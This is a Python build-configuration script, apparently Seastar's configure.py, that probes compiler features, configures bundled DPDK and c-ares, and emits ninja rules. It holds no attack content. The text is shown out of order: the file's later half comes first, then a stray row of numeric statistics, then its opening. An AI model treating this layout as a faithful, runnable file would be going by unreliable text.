'tests/output_stream_test': ['tests/output_stream_test.cc'] + core + libnet,
'tests/udp_zero_copy': ['tests/udp_zero_copy.cc'] + core + libnet,
'tests/shared_ptr_test': ['tests/shared_ptr_test.cc'] + core,
'tests/weak_ptr_test': ['tests/weak_ptr_test.cc'] + core,
'tests/checked_ptr_test': ['tests/checked_ptr_test.cc'] + core,
'tests/slab_test': ['tests/slab_test.cc'] + core,
'tests/fstream_test': ['tests/fstream_test.cc'] + core,
'tests/distributed_test': ['tests/distributed_test.cc'] + core,
'tests/rpc': ['tests/rpc.cc'] + core + libnet,
'tests/rpc_test': ['tests/rpc_test.cc'] + core + libnet,
'tests/packet_test': ['tests/packet_test.cc'] + core + libnet,
'tests/connect_test': ['tests/connect_test.cc'] + core + libnet,
'tests/chunked_fifo_test': ['tests/chunked_fifo_test.cc'] + core,
'tests/circular_buffer_test': ['tests/circular_buffer_test.cc'] + core,
'tests/perf/perf_fstream': ['tests/perf/perf_fstream.cc'] + core,
'tests/json_formatter_test': ['tests/json_formatter_test.cc'] + core + http,
'tests/dns_test': ['tests/dns_test.cc'] + core + libnet,
'tests/execution_stage_test': ['tests/execution_stage_test.cc'] + core,
'tests/lowres_clock_test': ['tests/lowres_clock_test.cc'] + core,
'tests/program_options_test': ['tests/program_options_test.cc'] + core,
'tests/tuple_utils_test': ['tests/tuple_utils_test.cc'],
'tests/tls_echo_server': ['tests/tls_echo_server.cc'] + core + libnet,
'tests/tls_simple_client': ['tests/tls_simple_client.cc'] + core + libnet,
'tests/circular_buffer_fixed_capacity_test': ['tests/circular_buffer_fixed_capacity_test.cc'],
'tests/scheduling_group_demo': ['tests/scheduling_group_demo.cc'] + core,
'tests/noncopyable_function_test': ['tests/noncopyable_function_test.cc'],
}
boost_tests = [
'tests/memcached/test_ascii_parser',
'tests/fileiotest',
'tests/futures_test',
'tests/alloc_test',
'tests/foreign_ptr_test',
'tests/semaphore_test',
'tests/expiring_fifo_test',
'tests/thread_test',
'tests/tls_test',
'tests/fair_queue_test',
'tests/httpd',
'tests/output_stream_test',
'tests/fstream_test',
'tests/rpc_test',
'tests/connect_test',
'tests/json_formatter_test',
'tests/dns_test',
'tests/execution_stage_test',
'tests/lowres_clock_test',
]
for bt in boost_tests:
deps[bt] += boost_test_lib
warnings = [
'-Wno-mismatched-tags', # clang-only
'-Wno-pessimizing-move', # clang-only: moving a temporary object prevents copy elision
'-Wno-redundant-move', # clang-only: redundant move in return statement
'-Wno-inconsistent-missing-override', # clang-only: 'x' overrides a member function but is not marked 'override'
'-Wno-unused-private-field', # clang-only: private field 'x' is not used
'-Wno-unknown-attributes', # clang-only: unknown attribute 'x' ignored (x in this case is gnu::externally_visible)
'-Wno-unneeded-internal-declaration', # clang-only: 'x' function 'x' declared in header file shouldb e declared 'x'
'-Wno-undefined-inline', # clang-only: inline function 'x' is not defined
'-Wno-overloaded-virtual', # clang-only: 'x' hides overloaded virtual functions
'-Wno-maybe-uninitialized',
'-Wno-sign-compare',
]
# The "--with-osv=<path>" parameter is a shortcut for a bunch of other
# settings:
if args.with_osv:
args.so = True
args.hwloc = False
args.user_cflags = (args.user_cflags +
' -DDEFAULT_ALLOCATOR -fvisibility=default -DHAVE_OSV -I' +
args.with_osv + ' -I' + args.with_osv + '/include -I' +
args.with_osv + '/arch/x64')
if args.allocator_page_size:
args.user_cflags += ' -DSEASTAR_OVERRIDE_ALLOCATOR_PAGE_SIZE=' + str(args.allocator_page_size)
dpdk_arch_xlat = {
'native': 'native',
'nehalem': 'nhm',
'westmere': 'wsm',
'sandybridge': 'snb',
'ivybridge': 'ivb',
}
dpdk_machine = 'native'
if args.dpdk:
    # Configure the bundled DPDK submodule: derive the target machine from
    # any -march= flag the user passed, generate DPDK's .config, and trim it
    # down to the features seastar actually needs.
    if not os.path.exists('dpdk') or not os.listdir('dpdk'):
        raise Exception('--enable-dpdk: dpdk/ is empty. Run "git submodule update --init".')
    cflags = args.user_cflags.split()
    dpdk_machine = ([dpdk_arch_xlat[cflag[7:]]
                     for cflag in cflags
                     if cflag.startswith('-march')] or ['native'])[0]
    # NOTE(review): .format() passes dpdk_machine, but the command string has
    # no '{dpdk_machine}' placeholder, so T= is effectively hard-coded to
    # 'native' — possibly a lost placeholder; verify against upstream.
    subprocess.check_call('make -C dpdk RTE_OUTPUT=$PWD/build/dpdk/ config T=x86_64-native-linuxapp-gcc'.format(
        dpdk_machine=dpdk_machine),
        shell = True)
    # adjust configuration to taste
    dotconfig = 'build/dpdk/.config'
    lines = open(dotconfig, encoding='UTF-8').readlines()
    def update(lines, vars):
        # Rewrite 'VAR=value' assignments in a Kconfig-style line list;
        # lines not mentioned in `vars` pass through unchanged.
        ret = []
        for line in lines:
            for var, val in vars.items():
                if line.startswith(var + '='):
                    line = var + '=' + val + '\n'
            ret.append(line)
        return ret
    # Disable the DPDK subsystems seastar does not use.  (The duplicate
    # CONFIG_RTE_LIBRTE_IP_FRAG key the original dict carried twice has been
    # collapsed to a single entry — duplicate literal keys are silently
    # overwritten in Python.)
    lines = update(lines, {'CONFIG_RTE_LIBRTE_PMD_BOND': 'n',
                           'CONFIG_RTE_MBUF_SCATTER_GATHER': 'n',
                           'CONFIG_RTE_LIBRTE_IP_FRAG': 'n',
                           'CONFIG_RTE_APP_TEST': 'n',
                           'CONFIG_RTE_TEST_PMD': 'n',
                           'CONFIG_RTE_MBUF_REFCNT_ATOMIC': 'n',
                           'CONFIG_RTE_MAX_MEMSEG': '8192',
                           'CONFIG_RTE_EAL_IGB_UIO': 'n',
                           'CONFIG_RTE_LIBRTE_KNI': 'n',
                           'CONFIG_RTE_KNI_KMOD': 'n',
                           'CONFIG_RTE_LIBRTE_JOBSTATS': 'n',
                           'CONFIG_RTE_LIBRTE_LPM': 'n',
                           'CONFIG_RTE_LIBRTE_ACL': 'n',
                           'CONFIG_RTE_LIBRTE_POWER': 'n',
                           'CONFIG_RTE_LIBRTE_METER': 'n',
                           'CONFIG_RTE_LIBRTE_SCHED': 'n',
                           'CONFIG_RTE_LIBRTE_DISTRIBUTOR': 'n',
                           'CONFIG_RTE_LIBRTE_PMD_CRYPTO_SCHEDULER': 'n',
                           'CONFIG_RTE_LIBRTE_REORDER': 'n',
                           'CONFIG_RTE_LIBRTE_PORT': 'n',
                           'CONFIG_RTE_LIBRTE_TABLE': 'n',
                           'CONFIG_RTE_LIBRTE_PIPELINE': 'n',
                           })
    # Append the machine selection as a proper config line.  The original
    # code did `lines += '<str>'`, which extended the *list* one character
    # per element and relied on writelines() concatenating them — it worked
    # by accident but dropped the trailing newline.
    lines.append('CONFIG_RTE_MACHINE={}\n'.format(dpdk_machine))
    open(dotconfig, 'w', encoding='UTF-8').writelines(lines)
    args.dpdk_target = os.getcwd() + '/build/dpdk'
if args.dpdk_target:
    # Wire the DPDK headers, machine cflags and PMD driver libraries into
    # the build; the --whole-archive bracket keeps the statically registered
    # PMD drivers from being dropped by the linker.
    args.user_cflags = (args.user_cflags +
        ' -DHAVE_DPDK -I' + args.dpdk_target + '/include ' +
        dpdk_cflags(args.dpdk_target) +
        ' -Wno-error=literal-suffix -Wno-literal-suffix -Wno-invalid-offsetof')
    libs += (' -L' + args.dpdk_target + '/lib ')
    if args.with_osv:
        libs += '-lintel_dpdk -lrt -lm -ldl'
    else:
        libs += '-Wl,--whole-archive -lrte_pmd_vmxnet3_uio -lrte_pmd_i40e -lrte_pmd_ixgbe -lrte_pmd_e1000 -lrte_pmd_ring -lrte_pmd_bnxt -lrte_pmd_cxgbe -lrte_pmd_ena -lrte_pmd_enic -lrte_pmd_fm10k -lrte_pmd_nfp -lrte_pmd_qede -lrte_pmd_sfc_efx -lrte_hash -lrte_kvargs -lrte_mbuf -lrte_ethdev -lrte_eal -lrte_mempool -lrte_mempool_ring -lrte_ring -lrte_cmdline -lrte_cfgfile -Wl,--no-whole-archive -lrt -lm -ldl'
args.user_cflags += ' -I{srcdir}/fmt'.format(**globals())
if not args.staticboost:
    args.user_cflags += ' -DBOOST_TEST_DYN_LINK'
# Keep only the warning suppressions this compiler actually understands.
warnings = [w
            for w in warnings
            if warning_supported(warning = w, compiler = args.cxx)]
warnings = ' '.join(warnings)
dbgflag = debug_flag(args.cxx) if args.debuginfo else ''
tests_link_rule = 'link' if args.tests_debuginfo else 'link_stripped'
sanitize_flags = sanitize_vptr_flag(args.cxx)
visibility_flags = adjust_visibility_flags(args.cxx)
visibility_flags = '-fvisibility=hidden ' + visibility_flags
# Hard-fail early with an actionable message when a build prerequisite is
# missing, instead of surfacing as an obscure compile error mid-build.
if not try_compile(args.cxx, '#include <gnutls/gnutls.h>'):
    print('Seastar requires gnutls. Install gnutls-devel/libgnutls-dev')
    sys.exit(1)
if not try_compile(args.cxx, '#include <gnutls/gnutls.h>\nint x = GNUTLS_NONBLOCK;'):
    print('Seastar requires gnutls >= 2.8. Install libgnutls28-dev or later.')
    sys.exit(1)
if not try_compile(args.cxx, '#include <experimental/string_view>', ['-std=gnu++1y']):
    print('Seastar requires g++ >= 4.9. Install g++-4.9 or later (use --compiler option).')
    sys.exit(1)
if not try_compile(args.cxx, '''#include <boost/version.hpp>\n\
#if BOOST_VERSION < 105500\n\
#error "Invalid boost version"\n\
#endif'''):
    print("Seastar requires boost >= 1.55")
    sys.exit(1)
modes['debug']['sanitize'] += ' ' + sanitize_flags
def have_hwloc():
    """Probe whether the hwloc and numa development headers are installed."""
    hwloc_probe = '#include <hwloc.h>\n#include <numa.h>'
    return try_compile(compiler = args.cxx, source = hwloc_probe)
# NUMA support is a tristate: auto-detect by default, hard error only when
# explicitly requested but unavailable.
if apply_tristate(args.hwloc, test = have_hwloc,
                  note = 'Note: hwloc-devel/numactl-devel not installed. No NUMA support.',
                  missing = 'Error: required packages hwloc-devel/numactl-devel not installed.'):
    libs += ' ' + hwloc_libs
    defines.append('HAVE_HWLOC')
    defines.append('HAVE_NUMA')
# Newer lz4 exposes LZ4_compress_default(); feature-detect it by compiling.
if try_compile(args.cxx, source = textwrap.dedent('''\
    #include <lz4.h>
    void m() {
      LZ4_compress_default(static_cast<const char*>(0), static_cast<char*>(0), 0, 0);
    }
    ''')):
    defines.append("HAVE_LZ4_COMPRESS_DEFAULT")
# ASan fiber-switch hooks are needed so the sanitizer can track seastar's
# userspace thread (fiber) stack switches; detect by compiling AND linking.
if try_compile_and_link(args.cxx, flags=['-fsanitize=address'], source = textwrap.dedent('''\
    #include <cstddef>
    extern "C" {
        void __sanitizer_start_switch_fiber(void**, const void*, size_t);
        void __sanitizer_finish_switch_fiber(void*, const void**, size_t*);
    }
    int main() {
        __sanitizer_start_switch_fiber(nullptr, nullptr, 0);
        __sanitizer_finish_switch_fiber(nullptr, nullptr, nullptr);
    }
    ''')):
    defines.append("HAVE_ASAN_FIBER_SUPPORT")
# Position-independence flags: embedded-static and shared-object builds are
# mutually exclusive shortcuts; plain --pie builds a PIE executable.
if args.embedded_static:
    args.pie = ''
    args.fpie = '-fPIC'
    visibility_flags = visibility_flags.replace('-fvisibility=hidden ', '')
    modes[args.mode]['cares_opts'] += ' -DCMAKE_C_FLAGS=-fPIC'
elif args.so:
    args.pie = '-shared'
    args.fpie = '-fpic'
elif args.pie:
    args.pie = '-pie'
    args.fpie = '-fpie'
else:
    args.pie = ''
    args.fpie = ''
defines = ' '.join(['-D' + d for d in defines])
# Export all parsed options as module globals so the ninja templates below
# can be filled with .format(**globals()).
globals().update(vars(args))
# Linking is memory-hungry; allow roughly one concurrent link per 7 GB RAM.
total_memory = os.sysconf('SC_PAGE_SIZE') * os.sysconf('SC_PHYS_PAGES')
link_pool_depth = max(int(total_memory / 7e9), 1)
build_modes = modes if args.mode == 'all' else [args.mode]
build_artifacts = all_artifacts if not args.artifacts else args.artifacts
dpdk_sources = []
if args.dpdk:
    for root, dirs, files in os.walk('dpdk'):
        dpdk_sources += [os.path.join(root, file)
                         for file in files
                         if file.endswith('.h') or file.endswith('.c')]
dpdk_sources = ' '.join(dpdk_sources)
# both source and builddir location
cares_dir = 'c-ares'
cares_lib = 'cares-seastar'
cares_src_lib = cares_dir + '/lib/libcares.a'
if not os.path.exists(cares_dir) or not os.listdir(cares_dir):
    raise Exception(cares_dir + ' is empty. Run "git submodule update --init".')
cares_sources = []
for root, dirs, files in os.walk('c-ares'):
    cares_sources += [os.path.join(root, file)
                      for file in files
                      if file.endswith('.h') or file.endswith('.c')]
cares_sources = ' '.join(cares_sources)
libs += ' -l' + cares_lib
# "libs" contains mostly pre-existing libraries, but if we want to add to
# it a library which we built here, we need to ensure that this library
# gets built before actually using "libs". So let's make a list "built_libs"
# of libraries which are targets built here. These libraries are all relative
# to the current mode's build directory.
built_libs = []
built_libs += ['lib' + cares_lib + '.a']
outdir = 'build'
buildfile = 'build.ninja'
os.makedirs(outdir, exist_ok = True)
# --static cannot coexist with the sanitizer runtimes, so debug-mode
# sanitizers get switched off below when static linking was requested.
do_sanitize = True
if args.static:
    do_sanitize = False
# Emit build.ninja: global variables and rules first, then one rule/target
# section per build mode, then per-source compile edges and generator rules.
with open(buildfile, 'w') as f:
    dpdk_deps = ''
    if args.dpdk:
        # fake dependencies on dpdk, so that it is built before anything else
        dpdk_deps = ' {dpdk_target}/include/rte_eal.h {dpdk_target}/lib/librte_eal.a'.format(dpdk_target=args.dpdk_target)
    f.write(textwrap.dedent('''\
        configure_args = {configure_args}
        builddir = {outdir}
        full_builddir = {srcdir}/$builddir
        cxx = {cxx}
        # we disable _FORTIFY_SOURCE because it generates false positives with longjmp() (core/thread.cc)
        cxxflags = -std=gnu++1y {dbgflag} {fpie} -Wall -Wno-unused-variable -Wno-unused-but-set-variable -Wno-error=deprecated-declarations {visibility_flags} -pthread -I{srcdir} -U_FORTIFY_SOURCE {user_cflags} {warnings} {defines}
        ldflags = {dbgflag} -Wl,--no-as-needed {static} {pie} {visibility_flags} -pthread {user_ldflags}
        libs = {libs}
        pool link_pool
            depth = {link_pool_depth}
        rule ragel
            # sed away a bug in ragel 7 that emits some extraneous _nfa* variables
            # (the $$ is collapsed to a single one by ninja)
            command = ragel -G2 -o $out $in && sed -i -e '1h;2,$$H;$$!d;g' -re 's/static const char _nfa[^;]*;//g' $out
            description = RAGEL $out
        rule gen
            command = /bin/echo -e $text > $out
            description = GEN $out
        rule swagger
            command = json/json2code.py -f $in -o $out
            description = SWAGGER $out
        rule protobuf
            command = protoc --cpp_out=$outdir $in
            description = PROTOC $out
        rule copy_file
            command = cp $in $out
        ''').format(**globals()))
    if args.dpdk:
        f.write(textwrap.dedent('''\
            rule dpdkmake
                command = make -C build/dpdk CC={args.cc}
            build {dpdk_deps} : dpdkmake {dpdk_sources}
            ''').format(**globals()))
    # Per-mode section: mode-specific flags, compile/link/archive rules, the
    # c-ares sub-build, then one build edge per artifact.
    for mode in build_modes:
        # objdeps maps an object file to extra order-only dependencies
        # (currently just the generated c-ares header for net/dns.o).
        objdeps = {}
        modeval = modes[mode]
        if modeval['sanitize'] and not do_sanitize:
            print('Note: --static disables debug mode sanitizers')
            modeval['sanitize'] = ''
            modeval['sanitize_libs'] = ''
        elif modeval['sanitize']:
            modeval['sanitize'] += ' -DASAN_ENABLED'
        f.write(textwrap.dedent('''\
            cxxflags_{mode} = {sanitize} {opt} -I$full_builddir/{mode}/gen -I$full_builddir/{mode}/c-ares
            libs_{mode} = {sanitize_libs} {libs}
            rule cxx.{mode}
              command = $cxx -MD -MT $out -MF $out.d $cxxflags_{mode} $cxxflags -c -o $out $in
              description = CXX $out
              depfile = $out.d
            rule link.{mode}
              command = $cxx  $cxxflags_{mode} -L$builddir/{mode} $ldflags -o $out $in $libs $libs_{mode} $extralibs
              description = LINK $out
              pool = link_pool
            rule link_stripped.{mode}
              command = $cxx  $cxxflags_{mode} -s -L$builddir/{mode} $ldflags -o $out $in $libs $libs_{mode} $extralibs
              description = LINK (stripped) $out
              pool = link_pool
            rule ar.{mode}
              command = rm -f $out; ar cr $out $in; ranlib $out
              description = AR $out
            ''').format(mode = mode, **modeval))
        f.write('build {mode}: phony $builddir/{mode}/lib{cares_lib}.a {artifacts}\n'.format(mode = mode, cares_lib=cares_lib,
            artifacts = str.join(' ', ('$builddir/' + mode + '/' + x for x in build_artifacts))))
        f.write(textwrap.dedent('''\
            rule caresmake_{mode}
                command = make -C build/{mode}/{cares_dir} CC={args.cc}
            rule carescmake_{mode}
                command = mkdir -p $builddir/{mode}/{cares_dir} && cd $builddir/{mode}/{cares_dir} && CC={args.cc} cmake {cares_opts} {srcdir}/$in
            build $builddir/{mode}/{cares_dir}/Makefile : carescmake_{mode} {cares_dir}
            build $builddir/{mode}/{cares_dir}/ares_build.h : phony $builddir/{mode}/{cares_dir}/Makefile
            build $builddir/{mode}/{cares_src_lib} : caresmake_{mode} $builddir/{mode}/{cares_dir}/Makefile | {cares_sources}
            build $builddir/{mode}/lib{cares_lib}.a : copy_file $builddir/{mode}/{cares_src_lib}
            ''').format(cares_opts=(modeval['cares_opts']), **globals()))
        objdeps['$builddir/' + mode + '/net/dns.o'] = ' $builddir/' + mode + '/' + cares_dir + '/ares_build.h'
        compiles = {}
        ragels = {}
        swaggers = {}
        protobufs = {}
        for binary in build_artifacts:
            srcs = deps[binary]
            objs = ['$builddir/' + mode + '/' + src.replace('.cc', '.o')
                    for src in srcs
                    if src.endswith('.cc')]
            objs += ['$builddir/' + mode + '/gen/' + src.replace('.proto', '.pb.o')
                     for src in srcs
                     if src.endswith('.proto')]
            if binary.endswith('.pc'):
                # pkg-config file: generated text, no compilation involved.
                vars = modeval.copy()
                vars.update(globals())
                pc = textwrap.dedent('''\
                    Name: Seastar
                    URL: http://seastar-project.org/
                    Description: Advanced C++ framework for high-performance server applications on modern hardware.
                    Version: 1.0
                    Libs: -L$full_builddir/{mode} -Wl,--whole-archive,-lseastar,--no-whole-archive $cxxflags $cxflags_{mode} -Wl,--no-as-needed {static} {pie} {user_ldflags} {sanitize_libs} {libs}
                    Cflags: $cxxflags $cxxflags_{mode}
                    ''').format(**vars)
                f.write('build $builddir/{}/{}: gen\n  text = {}\n'.format(mode, binary, repr(pc)))
            elif binary.endswith('.a'):
                f.write('build $builddir/{}/{}: ar.{} {}\n'.format(mode, binary, mode, str.join(' ', objs)))
            else:
                libdeps = str.join(' ', ('$builddir/{}/{}'.format(mode, i) for i in built_libs))
                extralibs = []
                if binary.startswith('tests/'):
                    if binary in boost_tests:
                        extralibs += [maybe_static(args.staticboost, '-lboost_unit_test_framework')]
                    # Our code's debugging information is huge, and multiplied
                    # by many tests yields ridiculous amounts of disk space.
                    # So we strip the tests by default; The user can very
                    # quickly re-link the test unstripped by adding a "_g"
                    # to the test name, e.g., "ninja build/release/testname_g"
                    f.write('build $builddir/{}/{}: {}.{} {} | {} {}\n'.format(mode, binary, tests_link_rule, mode, str.join(' ', objs), dpdk_deps, libdeps))
                    f.write('   extralibs = {}\n'.format(' '.join(extralibs)))
                    f.write('build $builddir/{}/{}_g: link.{} {} | {} {}\n'.format(mode, binary, mode, str.join(' ', objs), dpdk_deps, libdeps))
                    f.write('   extralibs = {}\n'.format(' '.join(extralibs)))
                else:
                    f.write('build $builddir/{}/{}: link.{} {} | {} {} $builddir/{}/lib{}.a\n'.format(mode, binary, mode, str.join(' ', objs), dpdk_deps, libdeps, mode, cares_lib))
            # Bucket each source by kind so the generator edges below can be
            # emitted after all artifacts have been walked.
            for src in srcs:
                if src.endswith('.cc'):
                    obj = '$builddir/' + mode + '/' + src.replace('.cc', '.o')
                    compiles[obj] = src
                elif src.endswith('.proto'):
                    hh = '$builddir/' + mode + '/gen/' + src.replace('.proto', '.pb.h')
                    protobufs[hh] = src
                    compiles[hh.replace('.h', '.o')] = hh.replace('.h', '.cc')
                elif src.endswith('.rl'):
                    hh = '$builddir/' + mode + '/gen/' + src.replace('.rl', '.hh')
                    ragels[hh] = src
                elif src.endswith('.json'):
                    hh = '$builddir/' + mode + '/gen/' + src + '.hh'
                    swaggers[hh] = src
                else:
                    raise Exception('No rule for ' + src)
        for obj in compiles:
            src = compiles[obj]
            gen_headers = list(ragels.keys()) + list(swaggers.keys()) + list(protobufs.keys())
            # Generated headers and dpdk are order-only deps ('||' / '|'
            # side) so touching them does not force a full recompile.
            f.write('build {}: cxx.{} {} || {} \n'.format(obj, mode, src, ' '.join(gen_headers) + dpdk_deps + objdeps.get(obj, '')))
        for hh in ragels:
            src = ragels[hh]
            f.write('build {}: ragel {}\n'.format(hh, src))
        for hh in swaggers:
            src = swaggers[hh]
            f.write('build {}: swagger {} | json/json2code.py\n'.format(hh,src))
        for pb in protobufs:
            src = protobufs[pb]
            c_pb = pb.replace('.h','.cc')
            outd = os.path.dirname(os.path.dirname(pb))
            f.write('build {} {}: protobuf {}\n  outdir = {}\n'.format(c_pb, pb, src, outd))
    f.write(textwrap.dedent('''\
        rule configure
          command = python3 configure.py $configure_args
          generator = 1
        build build.ninja: configure | configure.py
        rule cscope
            command = find -name '*.[chS]' -o -name "*.cc" -o -name "*.hh" | cscope -bq -i-
            description = CSCOPE
        build cscope: cscope
        rule md2html
            command = pandoc --self-contained --toc -c doc/template.css -V documentclass=report --chapters --number-sections -f markdown_github+pandoc_title_block --highlight-style tango $in -o $out
            description = PANDOC $out
        rule md2pdf
            command = pandoc -f markdown_github+pandoc_title_block --highlight-style tango --template=doc/template.tex $in -o $out
            description = PANDOC $out
        build doc/tutorial.html: md2html doc/tutorial.md
        build doc/tutorial.pdf: md2pdf doc/tutorial.md
        default {modes_list}
        ''').format(modes_list = ' '.join(build_modes), **globals()))
| 44.028754 | 411 | 0.596619 |
import os, os.path, textwrap, argparse, sys, shlex, subprocess, tempfile, re
# Re-quoted copy of the command line; embedded into build.ninja so that
# ninja can re-run configure with the same arguments.
configure_args = str.join(' ', [shlex.quote(x) for x in sys.argv[1:]])
# Scratch directory used by the compile/link feature probes below
# (created on demand by ensure_tmp_dir_exists()).
tempfile.tempdir = "./build/tmp"
srcdir = os.getcwd()
def get_flags():
    """Return the CPU feature flags listed in /proc/cpuinfo as a list of
    strings, or None when no 'flags' line is present."""
    with open('/proc/cpuinfo') as cpuinfo:
        for raw_line in cpuinfo:
            if not raw_line.strip():
                continue
            if raw_line.rstrip('\n').startswith('flags'):
                return re.sub(r'^flags\s+: ', '', raw_line).split()
def add_tristate(arg_parser, name, dest, help):
    """Register a --enable-<name>/--disable-<name> switch pair on arg_parser.

    Both switches write to the same destination: True when enabled, False
    when disabled, and None when neither is given (so apply_tristate can
    later pick a default by probing).
    """
    enable_switch = '--enable-' + name
    disable_switch = '--disable-' + name
    arg_parser.add_argument(enable_switch, dest = dest, action = 'store_true',
                            default = None, help = 'Enable ' + help)
    arg_parser.add_argument(disable_switch, dest = dest, action = 'store_false',
                            default = None, help = 'Disable ' + help)
def apply_tristate(var, test, note, missing):
    """Resolve a tristate option produced by add_tristate.

    Returns False immediately when the feature was explicitly disabled.
    Otherwise runs `test`: on success return True; on failure either abort
    with `missing` (feature was explicitly enabled) or print `note` and
    return False (feature was left on auto-detect).
    """
    explicitly_disabled = (var is not None) and (not var)
    if explicitly_disabled:
        return False
    if test():
        return True
    if var == True:
        # User demanded the feature but the probe failed: hard error.
        print(missing)
        sys.exit(1)
    print(note)
    return False
def dpdk_cflags (dpdk_target):
    """Return the MACHINE_CFLAGS computed by DPDK's build system for
    `dpdk_target` (path to an <arch>-<machine>-<os>-<toolchain> build dir).

    Works by writing a throwaway makefile that includes DPDK's rte.vars.mk
    and echoes $(MACHINE_CFLAGS), then invoking make on it.
    """
    ensure_tmp_dir_exists()
    with tempfile.NamedTemporaryFile() as sfile:
        dpdk_target = os.path.abspath(dpdk_target)
        dpdk_target = re.sub(r'\/+$', '', dpdk_target)
        dpdk_sdk_path = os.path.dirname(dpdk_target)
        dpdk_target_name = os.path.basename(dpdk_target)
        dpdk_arch = dpdk_target_name.split('-')[0]
        if args.dpdk:
            # Bundled-DPDK build: override with the in-tree locations.
            dpdk_sdk_path = 'dpdk'
            dpdk_target = os.getcwd() + '/build/dpdk'
            dpdk_target_name = 'x86_64-{}-linuxapp-gcc'.format(dpdk_machine)
            dpdk_arch = 'x86_64'
        sfile.file.write(bytes('include ' + dpdk_sdk_path + '/mk/rte.vars.mk' + "\n", 'utf-8'))
        sfile.file.write(bytes('all:' + "\n\t", 'utf-8'))
        sfile.file.write(bytes('@echo $(MACHINE_CFLAGS)' + "\n", 'utf-8'))
        sfile.file.flush()
        # (Renamed from 'dpdk_cflags', which shadowed this function's name;
        # the unused 'dpdk_cflags_final' local was dropped.)
        cflags_output = subprocess.check_output(['make', '--no-print-directory',
                                                 '-f', sfile.name,
                                                 'RTE_SDK=' + dpdk_sdk_path,
                                                 'RTE_OUTPUT=' + dpdk_target,
                                                 'RTE_TARGET=' + dpdk_target_name,
                                                 'RTE_SDK_BIN=' + dpdk_target,
                                                 'RTE_ARCH=' + dpdk_arch])
        # Strip trailing newline(s) so the flags can be spliced into cxxflags.
        return re.sub(r'\n+$', '', cflags_output.decode('utf-8'))
def try_compile(compiler, source = '', flags = []):
    """Return True if `source` compiles under `compiler` (compile only: -c)."""
    return try_compile_and_link(compiler, source, flags = flags + ['-c'])
def ensure_tmp_dir_exists():
    """Create the probe scratch directory (tempfile.tempdir) if needed.

    Uses exist_ok=True so repeated or concurrent calls cannot race between
    the existence check and the creation (the original exists()/makedirs()
    pair could raise FileExistsError under that race).
    """
    os.makedirs(tempfile.tempdir, exist_ok=True)
def try_compile_and_link(compiler, source = '', flags = []):
    """Return True if `source` compiles AND links cleanly under `compiler`,
    with the user's cflags plus `flags` appended."""
    ensure_tmp_dir_exists()
    with tempfile.NamedTemporaryFile() as src:
        out_path = tempfile.mktemp()
        try:
            src.file.write(bytes(source, 'utf-8'))
            src.file.flush()
            # output file based on the name of the output file, and "/dev/null.gcsa" is not a good name
            cmd = [compiler, '-x', 'c++', '-o', out_path, src.name]
            cmd += args.user_cflags.split() + flags
            status = subprocess.call(cmd,
                                     stdout = subprocess.DEVNULL,
                                     stderr = subprocess.DEVNULL)
            return status == 0
        finally:
            # Always remove the linked output, even when the probe failed.
            if os.path.exists(out_path):
                os.unlink(out_path)
def try_compile_and_run(compiler, flags, source, env = {}):
    """Compile `source`, then execute it; True iff both steps succeed.

    `env` entries are layered on top of the current process environment for
    the run step.
    """
    ensure_tmp_dir_exists()
    mktemp = tempfile.NamedTemporaryFile
    with mktemp() as src, mktemp(mode='rb') as exe:
        src.file.write(bytes(source, 'utf-8'))
        src.file.flush()
        exe.file.close()
        compile_cmd = [compiler, '-x', 'c++', '-o', exe.name, src.name]
        compile_cmd += args.user_cflags.split() + flags
        compiled_ok = subprocess.call(compile_cmd,
                                      stdout = subprocess.DEVNULL,
                                      stderr = subprocess.DEVNULL) == 0
        if not compiled_ok:
            # The compiler may delete the target on failure, and lead to
            # NamedTemporaryFile's destructor throwing an exception.
            open(exe.name, 'a').close()
            return False
        run_env = os.environ.copy()
        run_env.update(env)
        return subprocess.call([exe.name], stdout = subprocess.DEVNULL,
                               stderr = subprocess.DEVNULL, env=run_env) == 0
def warning_supported(warning, compiler):
    """True if `compiler` recognizes the given -Wno-* warning flag.

    gcc silently accepts unknown -Wno-* flags, so probe with the positive
    -W form plus -Werror instead.
    """
    positive_form = re.sub('^-Wno-', '-W', warning)
    return try_compile(compiler = compiler, flags = [positive_form, '-Werror'])
def debug_flag(compiler):
    """Return '-g' when the compiler can emit debug info for C++14 deduced
    ('auto') return types in templates, otherwise '' with a notice.

    The probe below is a minimal template whose member uses an auto return
    type; some older g++ versions could not generate -g output for it.
    """
    src_with_auto = textwrap.dedent('''\
        template <typename T>
        struct x { auto f() {} };
        x<int> a;
        ''')
    if try_compile(source = src_with_auto, flags = ['-g', '-std=gnu++1y'], compiler = compiler):
        return '-g'
    else:
        print('Note: debug information disabled; upgrade your compiler')
        return ''
def sanitize_vptr_flag(compiler):
    """Return '' when -fsanitize=vptr is unusable (does not even compile),
    or '-fno-sanitize=vptr' to explicitly disable it otherwise."""
    # NOTE(review): the second operand of the 'or' ends in 'and False', so
    # the try_compile_and_run() probe's result is always discarded — the
    # whole condition reduces to "flag does not compile".  Whenever the
    # compiler *does* accept -fsanitize=vptr we therefore always disable it.
    # Presumably a deliberate kill-switch for a known-broken sanitizer;
    # verify against upstream history before "fixing".
    if (not try_compile(compiler, flags=['-fsanitize=vptr'])
        or (try_compile_and_run(compiler, flags=['-fsanitize=undefined', '-fno-sanitize-recover'],
                                env={'UBSAN_OPTIONS': 'exitcode=1'}, source=textwrap.dedent('''
            struct A
            {
                virtual ~A() {}
            };
            struct B : virtual A {};
            struct C : virtual A {};
            struct D : B, virtual C {};
            int main()
            {
                D d;
            }
            '''))
        and False)):
        return ''
    else:
        print('Notice: -fsanitize=vptr is broken, disabling; some debug mode tests are bypassed.')
        return '-fno-sanitize=vptr'
def adjust_visibility_flags(compiler):
    """Return '-Wno-attributes' when gcc bug 80947 fires (spurious
    visibility warning for nested lambdas capturing `this` under
    -fvisibility=hidden), otherwise ''."""
    flags = ['-fvisibility=hidden', '-std=gnu++1y', '-Werror=attributes']
    if not try_compile(compiler, flags=flags, source=textwrap.dedent('''
            template <class T>
            class MyClass {
            public:
                MyClass() {
                    auto outer = [this] ()
                    {
                        auto fn = [this] { };
                        //use fn for something here
                    };
                }
            };
            int main() {
                MyClass<int> r;
            }
            ''')):
        print('Notice: disabling -Wattributes due to https://gcc.gnu.org/bugzilla/show_bug.cgi?id=80947')
        return '-Wno-attributes'
    else:
        return ''
# Per-mode build settings: 'debug' enables the sanitizers, stack guards and
# the libc allocator; 'release' is plain -O2.  'cares_opts' feeds the c-ares
# cmake sub-build.
modes = {
    'debug': {
        'sanitize': '-fsanitize=address -fsanitize=leak -fsanitize=undefined',
